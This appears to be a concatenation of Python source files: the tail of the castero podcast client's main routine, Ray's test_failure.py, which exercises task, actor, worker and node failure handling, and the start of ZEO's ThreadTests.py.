field2 = castero.__help__.split("{%s|" % field)[1].split("}")[0]
castero.__help__ = \
castero.__help__.replace(
"{%s|%s}" % (field, field2),
("%s or %s" % (Config[field], Config[field2])).ljust(9)
)
remaining_brace_fields = re.compile('\{.*?\}').findall(castero.__help__)
for field in remaining_brace_fields:
adjusted = field.replace("{", "").replace("}", "").ljust(9)
castero.__help__ = \
castero.__help__.replace(field, adjusted)
# check if user is running the client with an info flag
info_flags = {
'help': ['-h', '--help'],
'version': ['-v', '--version']
}
if sys.argv[len(sys.argv) - 1] in info_flags['help']:
print(castero.__help__)
sys.exit(0)
elif sys.argv[len(sys.argv) - 1] in info_flags['version']:
print(castero.__version__)
sys.exit(0)
# instantiate the display object
stdscr = curses.initscr()
display = Display(stdscr, database)
display.clear()
display.update_parent_dimensions()
# check if we need to start reloading
if helpers.is_true(Config['reload_on_start']):
reload_thread = threading.Thread(target=feeds.reload, args=[display])
reload_thread.start()
# run initial display operations
display.display()
display.update()
display.refresh()
# core loop for the client
running = True
while running:
display.display()
display.update()
display.refresh()
char = display.getch()
if char != -1:
running = display.handle_input(char)
sys.exit(0)
main()
|
test_failure.py
|
import json
import logging
import os
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.ray_constants as ray_constants
from ray.cluster_utils import Cluster
from ray.test_utils import (
relevant_errors,
wait_for_condition,
wait_for_errors,
RayTestTimeoutException,
SignalActor,
)
def test_failed_task(ray_start_regular):
@ray.remote
def throw_exception_fct1():
raise Exception("Test function 1 intentionally failed.")
@ray.remote
def throw_exception_fct2():
raise Exception("Test function 2 intentionally failed.")
@ray.remote(num_return_vals=3)
def throw_exception_fct3(x):
raise Exception("Test function 3 intentionally failed.")
throw_exception_fct1.remote()
throw_exception_fct1.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
msg = task.get("message")
assert "Test function 1 intentionally failed." in msg
x = throw_exception_fct2.remote()
try:
ray.get(x)
except Exception as e:
assert "Test function 2 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
x, y, z = throw_exception_fct3.remote(1.0)
for ref in [x, y, z]:
try:
ray.get(ref)
except Exception as e:
assert "Test function 3 intentionally failed." in str(e)
else:
# ray.get should throw an exception.
assert False
class CustomException(ValueError):
pass
@ray.remote
def f():
raise CustomException("This function failed.")
try:
ray.get(f.remote())
except Exception as e:
assert "This function failed." in str(e)
assert isinstance(e, CustomException)
assert isinstance(e, ray.exceptions.RayTaskError)
assert "RayTaskError(CustomException)" in repr(e)
else:
# ray.get should throw an exception.
assert False
def test_get_throws_quickly_when_found_exception(ray_start_regular):
# We use an actor instead of functions here. If we use functions, it's
# very likely that two normal tasks are submitted before the first worker
# is registered to Raylet. Since `maximum_startup_concurrency` is 1,
# the worker pool will wait for the registration of the first worker
# and skip starting new workers. The result is, the two tasks will be
# executed sequentially, which breaks an assumption of this test case -
# the two tasks run in parallel.
@ray.remote
class Actor(object):
def bad_func1(self):
raise Exception("Test function intentionally failed.")
def bad_func2(self):
os._exit(0)
def slow_func(self, signal):
ray.get(signal.wait.remote())
def expect_exception(objects, exception):
with pytest.raises(ray.exceptions.RayError) as err:
ray.get(objects)
assert err.type is exception
signal1 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func1.remote(),
actor.slow_func.remote(signal1)], ray.exceptions.RayTaskError)
ray.get(signal1.send.remote())
signal2 = SignalActor.remote()
actor = Actor.options(max_concurrency=2).remote()
expect_exception(
[actor.bad_func2.remote(),
actor.slow_func.remote(signal2)], ray.exceptions.RayActorError)
ray.get(signal2.send.remote())
def test_fail_importing_remote_function(ray_start_2_cpus):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define a function that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
def g(x, y=3):
try:
module.temporary_python_file()
except Exception:
# This test is not concerned with the error from running this
# function. Only from unpickling the remote function.
pass
# Invoke the function so that the definition is exported.
g.remote(1, y=2)
wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
assert len(errors) >= 2, errors
assert "No module named" in errors[0]["message"]
assert "No module named" in errors[1]["message"]
# Check that if we try to call the function it throws an exception and
# does not hang.
for _ in range(10):
with pytest.raises(
Exception, match="This function was not imported properly."):
ray.get(g.remote(1, y=2))
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_function_to_run(ray_start_2_cpus):
def f(worker):
if ray.worker.global_worker.mode == ray.WORKER_MODE:
raise Exception("Function to run failed.")
ray.worker.global_worker.run_function_on_all_workers(f)
wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
# Check that the error message is in the task info.
errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
assert len(errors) == 2
assert "Function to run failed." in errors[0]["message"]
assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
# Create the contents of a temporary Python file.
temporary_python_file = """
def temporary_helper_function():
return 1
"""
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
directory = os.path.dirname(f.name)
# Get the module name and strip ".py" from the end.
module_name = os.path.basename(f.name)[:-3]
sys.path.append(directory)
module = __import__(module_name)
# Define an actor that closes over this temporary module. This should
# fail when it is unpickled.
@ray.remote
class Foo:
def __init__(self, arg1, arg2=3):
self.x = module.temporary_python_file()
def get_val(self, arg1, arg2=3):
return 1
# There should be no errors yet.
assert len(ray.errors()) == 0
# Create an actor.
foo = Foo.remote(3, arg2=0)
# Wait for the error to arrive.
wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
assert "No module named" in errors[0]["message"]
# Wait for the error from when the __init__ tries to run.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[0]["message"])
# Check that if we try to get the function it throws an exception and
# does not hang.
with pytest.raises(Exception, match="failed to be imported"):
ray.get(foo.get_val.remote(1, arg2=2))
# Wait for the error from when the call to get_val.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert ("failed to be imported, and so cannot execute this method" in
errors[1]["message"])
f.close()
# Clean up the junk we added to sys.path.
sys.path.pop(-1)
def test_failed_actor_init(ray_start_regular):
error_message1 = "actor constructor failed"
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
raise Exception(error_message1)
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed constructor.
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message1 in errors[0]["message"]
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 2
assert error_message1 in errors[1]["message"]
def test_failed_actor_method(ray_start_regular):
error_message2 = "actor method failed"
@ray.remote
class FailedActor:
def __init__(self):
pass
def fail_method(self):
raise Exception(error_message2)
a = FailedActor.remote()
# Make sure that we get errors from a failed method.
a.fail_method.remote()
wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
assert len(errors) == 1
assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
@ray.remote
class Actor:
def __init__(self, missing_variable_name):
pass
def get_val(self, x):
pass
# Make sure that we get errors if we call the constructor incorrectly.
# Create an actor with too few arguments.
with pytest.raises(Exception):
a = Actor.remote()
# Create an actor with too many arguments.
with pytest.raises(Exception):
a = Actor.remote(1, 2)
# Create an actor the correct number of arguments.
a = Actor.remote(1)
# Call a method with too few arguments.
with pytest.raises(Exception):
a.get_val.remote()
# Call a method with too many arguments.
with pytest.raises(Exception):
a.get_val.remote(1, 2)
# Call a method that doesn't exist.
with pytest.raises(AttributeError):
a.nonexistent_method()
with pytest.raises(AttributeError):
a.nonexistent_method.remote()
def test_worker_raising_exception(ray_start_regular):
@ray.remote(max_calls=2)
def f():
# This is the only reasonable variable we can set here that makes the
# execute_task function fail after the task got executed.
worker = ray.worker.global_worker
worker.function_actor_manager.increase_task_counter = None
# Running this task should cause the worker to raise an exception after
# the task has successfully completed.
f.remote()
wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
# Define a remote function that will kill the worker that runs it.
@ray.remote(max_retries=0)
def f():
eval("exit()")
with pytest.raises(ray.exceptions.RayWorkerError):
ray.get(f.remote())
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert "died or was killed while executing" in errors[0]["message"]
def test_actor_worker_dying(ray_start_regular):
@ray.remote
class Actor:
def kill(self):
eval("exit()")
@ray.remote
def consume(x):
pass
a = Actor.remote()
[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_future_tasks(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular):
@ray.remote
class Actor:
pass
a = Actor.remote()
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
assert len(
ray.errors()) == 0, ("Should not have propogated an error - {}".format(
ray.errors()))
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory):
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
wait_for_errors(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
def test_version_mismatch(shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
wait_for_errors(ray_constants.VERSION_MISMATCH_PUSH_ERROR, 1)
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular):
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 1)
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
wait_for_errors(ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR, 2)
@pytest.mark.skip(reason="TODO detect resource deadlock")
def test_warning_for_resource_deadlock(shutdown_only):
# Check that we get warning messages for infeasible tasks.
ray.init(num_cpus=1)
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(2)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
wait_for_errors(ray_constants.RESOURCE_DEADLOCK_ERROR, 1, timeout=30)
def test_warning_for_infeasible_tasks(ray_start_regular):
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
# This actor placement task is infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 2)
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
wait_for_errors(ray_constants.INFEASIBLE_TASK_ERROR, 1)
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
[Foo.remote() for _ in range(num_cpus)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 2)
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h():
time.sleep(1)
ray.get(f.remote())
@ray.remote
def g():
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
time.sleep(1)
ray.get(h.remote())
[g.remote() for _ in range(num_cpus * 4)]
wait_for_errors(ray_constants.WORKER_POOL_LARGE_ERROR, 1)
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okey to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okey to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2, timeout=40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {
item["message"].split(" ")[5]
for item in relevant_errors(ray_constants.REMOVED_NODE_ERROR)
}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(object_ref)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = json.dumps({
"num_heartbeats_timeout": 50,
"raylet_heartbeat_timeout_milliseconds": 10,
})
cluster = Cluster()
cluster.add_node(num_cpus=0, _internal_config=config)
ray.init(address=cluster.address)
info = relevant_errors(ray_constants.REMOVED_NODE_ERROR)
assert len(info) == 0
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 1)
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 2)
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
with pytest.raises(RayTestTimeoutException):
wait_for_errors(ray_constants.REMOVED_NODE_ERROR, 3, timeout=2)
# There is no connection error to a dead node.
info = relevant_errors(ray_constants.RAYLET_CONNECTION_ERROR)
assert len(info) == 0
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
"_internal_config": json.dumps({
"object_store_full_max_retries": 0
})
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_internal_config=json.dumps({
"object_store_full_max_retries": 0
}))
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
def test_fill_object_store_lru_fallback(shutdown_only):
config = json.dumps({
"free_objects_batch_size": 1,
})
ray.init(
num_cpus=2,
object_store_memory=10**8,
lru_evict=True,
_internal_config=config)
@ray.remote
def expensive_task():
return np.zeros((10**8) // 2, dtype=np.uint8)
# Check that objects out of scope are cleaned up quickly.
ray.get(expensive_task.remote())
start = time.time()
for _ in range(3):
ray.get(expensive_task.remote())
end = time.time()
assert end - start < 3
obj_refs = []
for _ in range(3):
obj_ref = expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
for _ in range(3):
obj_ref = actor.some_expensive_task.remote()
ray.get(obj_ref)
obj_refs.append(obj_ref)
# Make sure actor does not die
ray.get(actor.test.remote())
for _ in range(3):
obj_ref = ray.put(np.zeros(10**8 // 2, dtype=np.uint8))
ray.get(obj_ref)
obj_refs.append(obj_ref)
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.UnreconstructableError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = json.dumps({
"num_heartbeats_timeout": 10,
"raylet_heartbeat_timeout_milliseconds": 100,
})
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _internal_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
ThreadTests.py
|
##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Compromising positions involving threads."""
import threading
from ZODB.Connection import TransactionMetaData
from ZODB.tests.StorageTestBase import zodb_pickle, MinPO
import ZEO.Exceptions
ZERO = '\0'*8
class BasicThread(threading.Thread):
def __init__(self, storage, doNextEvent, threadStartedEvent):
self.storage = storage
self.trans = TransactionMetaData()
self.doNextEvent = doNextEvent
self.threadStartedEvent = threadStartedEvent
self.gotValueError = 0
self.gotDisconnected = 0
threading.Thread.__init__(self)
self.setDaemon(1)
def join(self):
threading.Thread.join(self, 10)
assert not self.isAlive()
class GetsThroughVoteThread(BasicThread):
# This thread gets partially through a transaction before it turns
# execution over to another thread. We're trying to establish that a
# tpc_finish() after a storage has been closed by another thread will get
# a ClientStorageError error.
#
# This class gets does a tpc_begin(), store(), tpc_vote() and is waiting
